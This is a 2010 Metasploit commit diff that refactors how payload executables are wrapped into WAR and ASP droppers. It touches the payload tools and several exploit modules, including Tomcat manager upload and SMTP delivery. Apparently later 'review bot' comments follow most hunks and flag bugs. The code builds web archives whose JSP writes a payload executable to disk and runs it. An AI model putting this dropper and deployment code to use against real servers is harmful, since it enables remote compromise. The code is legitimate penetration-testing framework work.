rework to_jsp_war a bit, fix uses, default msfencode -t war to x86/win32

git-svn-id: file:///home/svn/framework3/trunk@10397 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-09-20 15:59:46 +00:00
parent 2cd8b7d5e2
commit bd1eeb3722
10 changed files with 25 additions and 34 deletions


@ -97,7 +97,8 @@ module Payload
plat = Msf::Module::PlatformList.transform(opts['Platform']) plat = Msf::Module::PlatformList.transform(opts['Platform'])
tmp_plat = plat.platforms tmp_plat = plat.platforms
buf = Msf::Util::EXE.to_jsp_war(framework, arch, tmp_plat, e.encoded, {:persist => false, :template => altexe}) exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, e.encoded, { :template => altexe})
buf = Msf::Util::EXE.to_jsp_war(exe, {:persist => false })
else else
# Serialize the generated payload to some sort of format # Serialize the generated payload to some sort of format
buf = Buffer.transform(e.encoded, fmt) buf = Buffer.transform(e.encoded, fmt)
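Review bot: `:persist => false` now reaches only `to_jsp_war`, which after this commit no longer calls `to_executable`, so if that flag was consumed by the executable generator (as the `:persist` key on the `to_win32pe_asp` call elsewhere in this commit suggests) it has silently become a no-op on the WAR path. Either drop it or hand it to the executable builder alongside `:template`: `exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, e.encoded, { :persist => false, :template => altexe })`. The msfpayload hunk of this commit tests the generated value for nil, but here `exe` goes straight into `to_jsp_war`; a guard such as `raise ArgumentError, "no executable for this arch/platform" unless exe` would fail loudly instead of emitting a WAR that wraps nothing. The enclosing `if`/`else` chain starts before the hunk.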


@ -216,7 +216,8 @@ class Module < Base
output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe}) output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
when 'war' when 'war'
tmp_plat = plat.platforms tmp_plat = plat.platforms
output = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe}) exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :template => altexe})
output = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
else else
fmt ||= "ruby" fmt ||= "ruby"
output = Msf::Simple::Buffer.transform(raw, fmt) output = Msf::Simple::Buffer.transform(raw, fmt)


@ -813,9 +813,7 @@ require 'metasm'
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload. # Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload.
# The jsp page converts the hexdump back to a normal .exe file and places it in # The jsp page converts the hexdump back to a normal .exe file and places it in
# the temp directory. The payload .exe file is then executed. # the temp directory. The payload .exe file is then executed.
def self.to_jsp_war(framework, arch, plat, code='', opts={}) def self.to_jsp_war(exe, opts={})
exe = to_executable(framework, arch, plat, code, opts)
# begin <payload>.jsp # begin <payload>.jsp
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
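Review bot: The header comment above `to_jsp_war` still describes the old contract — the method no longer generates the executable and cannot choose its format, and the parameter name `exe` plus the ".exe" wording is misleading now that the OS X caller in this commit hands it a Mach-O. Suggest replacing the comment with something like: `# Creates a Web Archive (WAR) containing a JSP page and a hexdump of +exe+, a prebuilt executable (any format) from to_executable or generate_payload_exe. The JSP writes the decoded bytes to a file in the temp directory and runs it. +opts+ is a hash of JSP/WAR options (callers in this commit pass :app_name, :jsp_name and :persist).` Which of those keys the body actually reads should be confirmed, since the body of `to_jsp_war` continues past the hunk.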


@ -172,9 +172,8 @@ class Metasploit3 < Msf::Exploit::Remote
:jsp_name => jsp_name :jsp_name => jsp_name
}) })
else else
@war_data = Msf::Util::EXE.to_jsp_war(framework, exe = generate_payload_exe({ :code => p.encoded })
arch, plat, @war_data = Msf::Util::EXE.to_jsp_war(exe,
p.encoded,
{ {
:app_name => app_base, :app_name => app_base,
:jsp_name => jsp_name :jsp_name => jsp_name
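Review bot: This module is switched to `generate_payload_exe`, but unlike the other three modules in this commit its section shows no `include Msf::Exploit::EXE` being added; if the mixin is not already included earlier in the file, the call raises NoMethodError the first time this `else` branch runs. Worth confirming against the module's include list before this lands. The multi-line `to_jsp_war` call and its enclosing `if` continue outside the hunk.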


@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -182,16 +183,10 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Using manually select target \"#{mytarget.name}\"") print_status("Using manually select target \"#{mytarget.name}\"")
end end
# set arch/platform from the target
arch = mytarget['Arch']
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
# Generate the WAR containing the EXE containing the payload # Generate the WAR containing the EXE containing the payload
jsp_name = rand_text_alphanumeric(4+rand(32-4)) jsp_name = rand_text_alphanumeric(4+rand(32-4))
war = Msf::Util::EXE.to_jsp_war(framework, exe = generate_payload_exe
arch, plat, war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
payload.encoded,
:jsp_name => jsp_name)
app_base = rand_text_alphanumeric(4+rand(32-4)) app_base = rand_text_alphanumeric(4+rand(32-4))
query_str = "?path=/" + app_base query_str = "?path=/" + app_base
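Review bot: The removed lines derived arch and platform from `mytarget` — the entry chosen by auto-detection or selected manually two lines earlier — while the replacement `generate_payload_exe` is called with no arguments, so whatever target it resolves internally (presumably the module's `target`) may differ from `mytarget` when detection picks a different entry than the datastore. If the mixin accepts them, pass the selection explicitly, e.g. `exe = generate_payload_exe(:arch => mytarget['Arch'], :platform => mytarget['Platform'])`, or assert that `mytarget` and `target` agree before generating. `exe` is also handed to `to_jsp_war` without a nil check. The `exploit` method continues outside the hunk.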


@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
# This module sends email messages via smtp # This module sends email messages via smtp
# #
include Msf::Exploit::Remote::SMTPDeliver include Msf::Exploit::Remote::SMTPDeliver
include Msf::Exploit::EXE
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -142,16 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (target.arch.include?(ARCH_CMD)) if (target.arch.include?(ARCH_CMD))
cmd = Rex::Text.encode_base64(payload.encoded, "\r\n") cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
else else
bin = '' bin = generate_payload_exe
if(target.arch.index(ARCH_PPC))
bin = Msf::Util::EXE.to_osx_ppc_macho(framework, payload.encoded)
end
if(target.arch.index(ARCH_X86))
bin = Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded)
end
cmd = Rex::Text.encode_base64(bin, "\r\n") cmd = Rex::Text.encode_base64(bin, "\r\n")
end end
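Review bot: The old branch quietly fell back to `bin = ''` when the target arch matched neither PPC nor x86; the replacement makes `bin` whatever `generate_payload_exe` returns, and if that is nil for an arch the mixin cannot build, `Rex::Text.encode_base64(bin, "\r\n")` fails with a bare NoMethodError rather than a descriptive error. A guard such as `raise ArgumentError, "could not build an executable for #{target.arch.inspect}" unless bin` keeps the stricter behaviour while naming the cause. Whether the mixin still picks Mach-O for the OS X targets as the removed code did depends on each target's platform entry, which the hunk does not show. The enclosing method continues outside the hunk.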


@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -55,13 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
arch = target['Arch']
plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
# Generate the WAR containing the EXE containing the payload # Generate the WAR containing the EXE containing the payload
app_base = rand_text_alphanumeric(4+rand(32-4)) app_base = rand_text_alphanumeric(4+rand(32-4))
jsp_name = rand_text_alphanumeric(8+rand(8)) jsp_name = rand_text_alphanumeric(8+rand(8))
war_data = Msf::Util::EXE.to_jsp_war(framework, arch, plat, payload.encoded, :jsp_name => jsp_name)
exe = generate_payload_exe
war_data = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
res = send_request_cgi( res = send_request_cgi(
{ {


@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
# Generate the ASP containing the EXE containing the payload # Generate the ASP containing the EXE containing the payload
asp = Msf::Util::EXE.to_win32pe_asp(framework,payload.encoded) exe = generate_payload_exe
asp = Msf::Util::EXE.to_exe_asp(exe)
path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s) path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
path_tmp = path.gsub(/\....$/, ".txt") path_tmp = path.gsub(/\....$/, ".txt")
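Review bot: `Msf::Util::EXE.to_exe_asp` is not defined or renamed in any hunk of this commit, and the other two ASP callers in the commit (the Simple::Module and msfencode hunks) keep calling `to_win32pe_asp($framework, raw, {...})`; if `to_exe_asp(exe)` does not already exist in Msf::Util::EXE this module raises NoMethodError at exploit time, and if it does, the two call shapes should be reconciled the same way `to_jsp_war` was. Worth confirming the helper exists before this lands. The `exploit` method continues past the hunk.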


@ -273,8 +273,11 @@ case cmd
asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe}) asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
write_encoded(asp) write_encoded(asp)
when 'war' when 'war'
tmp_plat = plat.platforms arch ||= [ ARCH_X86 ]
war = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe}) tmp_plat = plat.platforms if plat
tmp_plat ||= Msf::Module::PlatformList.transform('win')
exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :insert => inject, :template => altexe })
war = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
write_encoded(war) write_encoded(war)
else else
fmt ||= "ruby" fmt ||= "ruby"
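Review bot: The x86/win32 defaults are applied silently; a payload read from stdin without `-a`/`-p` will be wrapped in a Windows PE even when it was built for another platform, and the user gets no hint that a guess was made — print a status line when either default kicks in. Note also that `tmp_plat ||= ...` only fires when `plat` is nil: if `plat.platforms` can return an empty list, that list is truthy in Ruby, the 'win' default is skipped and `to_executable` receives no platform at all; `tmp_plat = plat.platforms if plat && !plat.platforms.empty?` closes that gap. The enclosing `case` starts before the hunk.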


@ -156,7 +156,8 @@ if (cmd =~ /^(p|y|r|d|c|j|x|b|v|w)/)
arch = payload.arch arch = payload.arch
plat = payload.platform.platforms plat = payload.platform.platforms
exe = Msf::Util::EXE.to_jsp_war($framework, arch, plat, buf) exe = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
exe = Msf::Util::EXE.to_jsp_war(exe)
if(exe) if(exe)
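Review bot: The `if(exe)` test now checks the WAR, not the executable: when `to_executable` returns nil for an unsupported arch/platform, `to_jsp_war(nil)` has already been called on the line before. The minimal fix is to skip the wrap when there is nothing to wrap, `exe = Msf::Util::EXE.to_jsp_war(exe) if exe`, so the existing nil check covers both steps; reusing `exe` for the WAR is also misleading, though renaming it would touch the body of the `if`, which continues past the hunk.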